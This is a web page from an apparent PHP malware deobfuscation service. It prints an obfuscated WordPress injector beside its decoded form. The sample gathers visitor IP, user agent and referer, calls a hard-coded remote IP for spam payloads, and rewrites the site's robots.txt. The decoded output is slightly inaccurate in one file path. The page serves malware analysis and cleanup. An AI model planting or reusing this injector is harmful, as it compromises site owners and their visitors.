Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php @header('Content-Type:text/html;charset=utf-8'); error_reporting(0); $OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%...



Obfuscated php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
$oOooOO = 'z0823_7';
$oOooOOoO = "http://198.204.238.74/z0823_7/";
$oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
$oOoooOOoOO = $_SERVER["REQUEST_URI"];
$ooOOoooOOoOO = $_SERVER["HTTP_HOST"];
$ooOOOoooOOoOO = $_SERVER["PHP_SELF"];
$ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"];
$ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO;
$oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php";
$ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php";
$ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php";
$oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php";
$ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php";
$ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$ooooooOoOoooOOOooo["http_user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"];
$ooooooOoOoooOOOooo["ip"] = $_SERVER["REMOTE_ADDR"];
$ooooooOoOoooOOOooo["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ooooooOoOoooOOOooo[] = array();
$ooooooOoOoooOOOooo[$O[12] . $O[8] . $O[25] . $O[10] . $O[7] . $O[24]] = $ooOOoooOOoOO;
$ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[0] . $O[52] . $O[6] . $O[3] . $O[7]] = $oOoooOOoOO;
$ooooooOoOoooOOOooo[$O[15] . $O[3] . $O[2] . $O[13]] = $ooooooOOoooOOOoooOo;
$ooooooOoOoooOOOooo[$O[3] . $O[2] . $O[0] . $O[52] . $O[6] . $O[3] . $O[18]] = $ooOOOOoooOOOOoOO;
if (substr($oOoooOOoOO, 6) == $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11]) {
    $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($ooooooooOOOOoooOOoooOO, $ooooooOoOoooOOOooo);
    define('BASE_PATH', str_ireplace($_SERVER[$O[35] . $O[41] . $O[35] . $O[52] . $O[37] . $O[28] . $O[44] . $O[39]], '', "/var/www/html/input.php"));
    file_put_contents(BASE_PATH . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4], $ooooooooOOOOOoooOoOoooOO);
    $ooooooooOOOOOoooOoOoooOO = file_get_contents(BASE_PATH . $O[63] . $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4]);
    if (strpos($ooooooooOOOOOoooOoOoooOO, $O[59] . $O[20] . $O[25] . $O[18])) {
        echo $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4] . $O[57] . $O[13] . $O[7] . $O[18] . $O[2] . $O[57] . $O[21] . $O[3] . $O[2] . $O[10] . $O[4] . $O[2] . $O[57] . $O[11] . $O[6] . $O[21] . $O[21] . $O[2] . $O[11] . $O[11] . $O[88];
    } else {
        echo $O[3] . $O[8] . $O[23] . $O[8] . $O[4] . $O[11] . $O[59] . $O[4] . $O[20] . $O[4] . $O[57] . $O[13] . $O[7] . $O[18] . $O[2] . $O[57] . $O[21] . $O[3] . $O[2] . $O[10] . $O[4] . $O[2] . $O[57] . $O[13] . $O[10] . $O[7] . $O[18] . $O[88];
    }
    exit;
}
?>

Decoded(de-Obfuscated) php code

<?php

@header('Content-Type:text/html;charset=utf-8');
error_reporting(0);
$OOOOOO = "%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^\$[]\\\\%{}!*|+,";
$oOooOO = 'z0823_7';
$oOooOOoO = "http://198.204.238.74/z0823_7/";
$oOooOOoOO = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https://" : "http://";
$oOoooOOoOO = $_SERVER["REQUEST_URI"];
$ooOOoooOOoOO = $_SERVER["HTTP_HOST"];
$ooOOOoooOOoOO = $_SERVER["PHP_SELF"];
$ooOOOOoooOOOoOO = $_SERVER["SERVER_NAME"];
$ooOOOOoooOOOOoOO = $oOooOOoOO . $ooOOoooOOoOO . $oOoooOOoOO;
$oooOOOOoooOOOooOO = "http://198.204.238.74/z0823_7//indata.php";
$ooooOOOOoooOOOooO = "http://198.204.238.74/z0823_7//map.php";
$ooooOOOOoooOOOooOoo = "http://198.204.238.74/z0823_7//jump.php";
$oooooOOoooOOOoooOoo = "http://198.204.238.74/z0823_7//words.php";
$ooooooooOOOOoooOOoooOO = "http://198.204.238.74/z0823_7//robots.php";
$ooooooOoOoooOOOooo["user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$oooOoOOooOoooOOOoOoOoOoOoO = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$ooooooOoOoooOOOooo["http_user_agent"] = strtolower(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '');
$oooOOOooOoooOOOooooOoOoOoOoO = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ooooOOOOoooOOOoooOOO = $_SERVER["REMOTE_ADDR"];
$ooooooOoOoooOOOooo["ip"] = $_SERVER["REMOTE_ADDR"];
$ooooooOoOoooOOOooo["referer"] = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$ooooooOoOoooOOOooo[] = array();
$ooooooOoOoooOOOooo["domain"] = $ooOOoooOOoOO;
$ooooooOoOoooOOOooo["req_uri"] = $oOoooOOoOO;
$ooooooOoOoooOOOooo["href"] = $ooooooOOoooOOOoooOo;
$ooooooOoOoooOOOooo["req_url"] = $ooOOOOoooOOOOoOO;
if (substr($oOoooOOoOO, 6) == "robots") {
    $ooooooooOOOOOoooOoOoooOO = ooOOoOOO($ooooooooOOOOoooOOoooOO, $ooooooOoOoooOOOooo);
    define('BASE_PATH', str_ireplace($_SERVER["PHP_SELF"], '', "/var/www/html/input.php"));
    file_put_contents("BASE_PATH/robots.txt", $ooooooooOOOOOoooOoOoooOO);
    $ooooooooOOOOOoooOoOoooOO = file_get_contents("BASE_PATH/robots.txt");
    if (strpos($ooooooooOOOOOoooOoOoooOO, ".xml")) {
        echo "robots.txt file create success!";
    } else {
        echo "robots.txt file create fail!";
    }
    exit;
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.